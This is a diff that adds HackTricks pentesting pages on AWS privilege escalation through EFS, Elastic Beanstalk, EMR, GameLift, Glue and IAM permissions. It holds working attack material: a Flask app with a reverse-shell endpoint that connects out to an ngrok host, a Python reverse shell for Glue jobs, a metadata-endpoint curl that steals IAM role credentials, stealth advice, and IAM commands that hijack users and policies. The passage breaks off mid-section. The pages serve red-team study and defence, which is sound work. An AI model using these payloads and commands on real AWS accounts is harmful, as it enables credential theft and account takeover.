+The extra permissions`elasticfilesystem:ClientRootAccess` and `elasticfilesystem:ClientWrite` can be used to **write** inside the filesystem after it's mounted and to **access** that file system **as root**.
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the file system.
+
+### `elasticfilesystem:CreateMountTarget`
+
+If you an attacker is inside a **subnetwork** where **no mount target** of the EFS exists. He could just **create one in his subnet** with this privilege:
+
+```bash
+# You need to indicate security groups that will grant the user access to port 2049
+aws efs create-mount-target --file-system-id <fs-id> \
+    --subnet-id <value> \
+    --security-groups <value>
+```
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the file system.
+
+### `elasticfilesystem:ModifyMountTargetSecurityGroups`
+
+In a scenario where an attacker finds that the EFS has mount target in his subnetwork but **no security group is allowing the traffic**, he could just **change that modifying the selected security groups**:
+
+```bash
+aws efs modify-mount-target-security-groups \
+    --mount-target-id <value> \
+    --security-groups <value>
+```
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the file system.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
new file mode 100644
index 0000000000..fc4a278bfe
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
@@ -0,0 +1,218 @@
+# AWS - Elastic Beanstalk Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Elastic Beanstalk
+
+More **info about Elastic Beanstalk** in:
+
+{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %}
+[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md)
+{% endcontent-ref %}
+
+{% hint style="warning" %}
+In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`**
+{% endhint %}
+
+### `elasticbeanstalk:RebuildEnvironment`, S3 write permissions & many others
+
+With **write permissions over the S3 bucket** containing the **code** of the environment and permissions to **rebuild** the application (it's needed `elasticbeanstalk:RebuildEnvironment` and a few more related to `S3` , `EC2` and `Cloudformation`), you can **modify** the **code**, **rebuild** the app and the next time you access the app it will **execute your new code**, allowing the attacker to compromise the application and the IAM role credentials of it.
+
+{% code overflow="wrap" %}
+```bash
+# Create folder
+mkdir elasticbeanstalk-eu-west-1-947247140022
+cd elasticbeanstalk-eu-west-1-947247140022
+# Download code
+aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
+# Change code
+unzip 1692777270420-aws-flask-app.zip
+zip 1692777270420-aws-flask-app.zip <files to zip>
+# Upload code
+aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
+# Rebuild env
+aws elasticbeanstalk rebuild-environment --environment-name "env-name"
+```
+{% endcode %}
+
+### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more...
+
+The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch.
+
+* Create an AWS Elastic Beanstalk application:
+
+```bash
+aws elasticbeanstalk create-application --application-name MyApp
+```
+
+* Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)):
+
+{% code overflow="wrap" %}
+```bash
+aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role
+```
+{% endcode %}
+
+If an environment is already created and you **don't want to create a new one**, you could just **update** the existent one.
+
+* Package your application code and dependencies into a ZIP file:
+
+```python
+zip -r MyApp.zip .
+```
+
+* Upload the ZIP file to an S3 bucket:
+
+```python
+aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip
+```
+
+* Create an AWS Elastic Beanstalk application version:
+
+{% code overflow="wrap" %}
+```css
+aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"
+```
+{% endcode %}
+
+* Deploy the application version to your AWS Elastic Beanstalk environment:
+
+{% code overflow="wrap" %}
+```bash
+aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
+```
+{% endcode %}
+
+### `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`, `autoscaling:SuspendProcesses`
+
+First of all you need to create a **legit Beanstalk environment** with the **code** you would like to run in the **victim** following the **previous steps**. Potentially a simple **zip** containing these **2 files**:
+
+{% tabs %}
+{% tab title="application.py" %}
+```python
+from flask import Flask, request, jsonify
+import subprocess,os, socket
+
+application = Flask(__name__)
+
+@application.errorhandler(404)
+def page_not_found(e):
+        return jsonify('404')
+
+@application.route("/")
+def index():
+        return jsonify('Welcome!')
+
+
+@application.route("/get_shell")
+def search():
+        host=request.args.get('host')
+        port=request.args.get('port')
+        if host and port:
+            s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+            s.connect((host,int(port)))
+            os.dup2(s.fileno(),0)
+            os.dup2(s.fileno(),1)
+            os.dup2(s.fileno(),2)
+            p=subprocess.call(["/bin/sh","-i"])
+        return jsonify('done')
+
+if __name__=="__main__":
+    application.run()
+```
+{% endtab %}
+
+{% tab title="requirements.txt" %}
+```
+click==7.1.2
+Flask==1.1.2
+itsdangerous==1.1.0
+Jinja2==2.11.3
+MarkupSafe==1.1.1
+Werkzeug==1.0.1
+```
+{% endtab %}
+{% endtabs %}
+
+Once you have **your own Beanstalk env running** your rev shell, it's time to **migrate** it to the **victims** env. To so so you need to **update the Bucket Policy** of your beanstalk S3 bucket so the **victim can access it** (Note that this will **open** the Bucket to **EVERYONE**):
+
+```json
+{
+    "Version": "2008-10-17",
+    "Statement": [
+        {
+            "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Action": [
+                "s3:ListBucket",
+                "s3:ListBucketVersions",
+                "s3:GetObject",
+                "s3:GetObjectVersion",
+                "s3:*"
+            ],
+            "Resource": [
+                "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
+                "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
+            ]
+        },
+        {
+            "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
+            "Effect": "Deny",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Action": "s3:DeleteBucket",
+            "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
+        }
+    ]
+}
+```
+
+{% code overflow="wrap" %}
+```bash
+# Use a new --version-label
+# Use the bucket from your own account
+aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"
+
+# These step needs the extra permissions
+aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
+
+# To get your rev shell just access the exposed web URL with params such as:
+http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528
+
+Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance). 
+
+The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. 
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md
new file mode 100644
index 0000000000..acad83823e
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md
@@ -0,0 +1,92 @@
+# AWS - EMR Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EMR
+
+More **info about EMR** in:
+
+{% content-ref url="../aws-services/aws-emr-enum.md" %}
+[aws-emr-enum.md](../aws-services/aws-emr-enum.md)
+{% endcontent-ref %}
+
+### `iam:PassRole`, `elasticmapreduce:RunJobFlow`
+
+An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\
+Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`).
+
+```bash
+# Import EC2 ssh key (you will need extra permissions for this)
+ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
+chmod 400 /tmp/sshkey
+base64 /tmp/sshkey.pub > /tmp/pub.key
+aws ec2 import-key-pair \
+    --key-name "privesc" \
+    --public-key-material file:///tmp/pub.key
+
+
+aws emr create-cluster \
+    --release-label emr-5.15.0 \
+    --instance-type m4.large \
+    --instance-count 1 \
+    --service-role EMR_DefaultRole \
+    --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc
+
+# Wait 1min and connect via ssh to an EC2 instance of the cluster)
+aws emr describe-cluster --cluster-id <id>
+# In MasterPublicDnsName you can find the DNS to connect to the master instance
+## You cna also get this info listing EC2 instances
+```
+
+Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role.
+
+**Potential Impact:** Privesc to the EC2 service role specified.
+
+### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole`
+
+With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role.
+
+{% hint style="danger" %}
+Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related.
+{% endhint %}
+
+**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
+
+### `elasticmapreduce:OpenEditorInConsole`
+
+Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\
+The URL of the notebook is `https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/`
+
+{% hint style="danger" %}
+Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related`.`
+{% endhint %}
+
+**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md
new file mode 100644
index 0000000000..77979f8054
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md
@@ -0,0 +1,44 @@
+# AWS - Gamelift
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### `gamelift:RequestUploadCredentials`
+
+With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**.
+
+```bash
+aws gamelift request-upload-credentials \
+    --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111
+```
+
+## References
+
+* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md
new file mode 100644
index 0000000000..29164911df
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md
@@ -0,0 +1,118 @@
+# AWS - Glue Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## glue
+
+### `iam:PassRole`, `glue:CreateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)
+
+Users with these permissions can **set up a new AWS Glue development endpoint**, **assigning an existing service role assumable by Glue** with specific permissions to this endpoint.
+
+After the setup, the **attacker can SSH into the endpoint's instance**, and steal the IAM credentials of the assigned role:
+
+```bash
+# Create endpoint
+aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
+    --role-arn <arn-role> \
+    --public-key file:///ssh/key.pub
+
+# Get the public address of the instance
+## You could also use get-dev-endpoints
+aws glue get-dev-endpoint --endpoint-name privesctest
+
+# SSH with the glue user
+ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
+```
+
+For stealth purpose, it's recommended to use the IAM credentials from inside the Glue virtual machine.
+
+**Potential Impact:** Privesc to the glue service role specified.
+
+### `glue:UpdateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)
+
+Users with this permission can **alter an existing Glue development** endpoint's SSH key, **enabling SSH access to it**. This allows the attacker to execute commands with the privileges of the endpoint's attached role:
+
+```bash
+# Change public key to connect
+aws glue --endpoint-name target_endpoint \
+    --public-key file:///ssh/key.pub
+
+# Get the public address of the instance
+## You could also use get-dev-endpoints
+aws glue get-dev-endpoint --endpoint-name privesctest
+
+# SSH with the glue user
+ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
+```
+
+**Potential Impact:** Privesc to the glue service role used.
+
+### `iam:PassRole`, (`glue:CreateJob` | `glue:UpdateJob`), (`glue:StartJobRun` | `glue:CreateTrigger`)
+
+Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:UpdateJob`**, and either **`glue:StartJobRun` or `glue:CreateTrigger`** can **create or update an AWS Glue job**, attaching any **Glue service account**, and initiate the job's execution. The job's capabilities include running arbitrary Python code, which can be exploited to establish a reverse shell. This reverse shell can then be utilized to exfiltrate the **IAM credential**s of the role attached to the Glue job, leading to potential unauthorized access or actions based on the permissions of that role:
+
+```bash
+# Content of the python script saved in s3:
+#import socket,subprocess,os
+#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+#s.connect(("2.tcp.ngrok.io",11216))
+#os.dup2(s.fileno(),0)
+#os.dup2(s.fileno(),1)
+#os.dup2(s.fileno(),2)
+#p=subprocess.call(["/bin/sh","-i"])
+#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
+
+
+# A Glue role with admin access was created
+aws glue create-job \
+    --name privesctest \
+    --role arn:aws:iam::93424712358:role/GlueAdmin \
+    --command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'
+
+# You can directly start the job
+aws glue start-job-run --job-name privesctest
+# Or you can create a trigger to start it
+aws glue create-trigger --name triggerprivesc --type SCHEDULED \
+    --actions '[{"JobName": "privesctest"}]' --start-on-creation \
+    --schedule "0/5 * * * * *"  #Every 5mins, feel free to change
+```
+
+**Potential Impact:** Privesc to the glue service role specified.
+
+### `glue:UpdateJob`
+
+Just with the update permission an attacked could steal the IAM Credentials of the already attached role.
+
+**Potential Impact:** Privesc to the glue service role attached.
+
+## References
+
+* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md
new file mode 100644
index 0000000000..bc19f13410
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md
@@ -0,0 +1,314 @@
+# AWS - IAM Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## IAM
+
+For more info about IAM check:
+
+{% content-ref url="../aws-services/aws-iam-enum.md" %}
+[aws-iam-enum.md](../aws-services/aws-iam-enum.md)
+{% endcontent-ref %}
+
+### **`iam:CreatePolicyVersion`**
+
+Grants the ability to create a new IAM policy version, bypassing the need for `iam:SetDefaultPolicyVersion` permission by using the `--set-as-default` flag. This enables defining custom permissions.
+
+**Exploit Command:**
+
+```bash
+aws iam create-policy-version --policy-arn <target_policy_arn> \
+    --policy-document file:///path/to/administrator/policy.json --set-as-default
+```
+
+**Impact:** Directly escalates privileges by allowing any action on any resource.
+
+### **`iam:SetDefaultPolicyVersion`**
+
+Allows changing the default version of an IAM policy to another existing version, potentially escalating privileges if the new version has more permissions.
+
+**Bash Command:**
+
+```bash
+aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2
+```
+
+**Impact:** Indirect privilege escalation by enabling more permissions.
+
+### **`iam:CreateAccessKey`**
+
+Enables creating access key ID and secret access key for another user, leading to potential privilege escalation.
+
+**Exploit:**
+
+```bash
+aws iam create-access-key --user-name <target_user>
+```
+
+**Impact:** Direct privilege escalation by assuming another user's extended permissions.
+
+### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**
+
+Permits creating or updating a login profile, including setting passwords for AWS console login, leading to direct privilege escalation.
+
+**Exploit for Creation:**
+
+```bash
+aws iam create-login-profile --user-name target_user --no-password-reset-required \
+    --password '<password>'
+```
+
+**Exploit for Update:**
+
+```bash
+aws iam update-login-profile --user-name target_user --no-password-reset-required \
+    --password '<password>'
+```
+
+**Impact:** Direct privilege escalation by logging in as "any" user.
+
+### **`iam:UpdateAccessKey`**
+
+Allows enabling a disabled access key, potentially leading to unauthorized access if the attacker possesses the disabled key.
+
+**Exploit:**
+
+{% code overflow="wrap" %}
+```bash
+aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>
+```
+{% endcode %}
+
+**Impact:** Direct privilege escalation by reactivating access keys.
+
+### **`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`**
+
+Enables generating or resetting credentials for specific AWS services (e.g., CodeCommit, Amazon Keyspaces), inheriting the permissions of the associated user.
+
+**Exploit for Creation:**
+
+{% code overflow="wrap" %}
+```bash
+aws iam create-service-specific-credential --user-name <username> --service-name <service>
+```
+{% endcode %}
+
+**Exploit for Reset:**
+
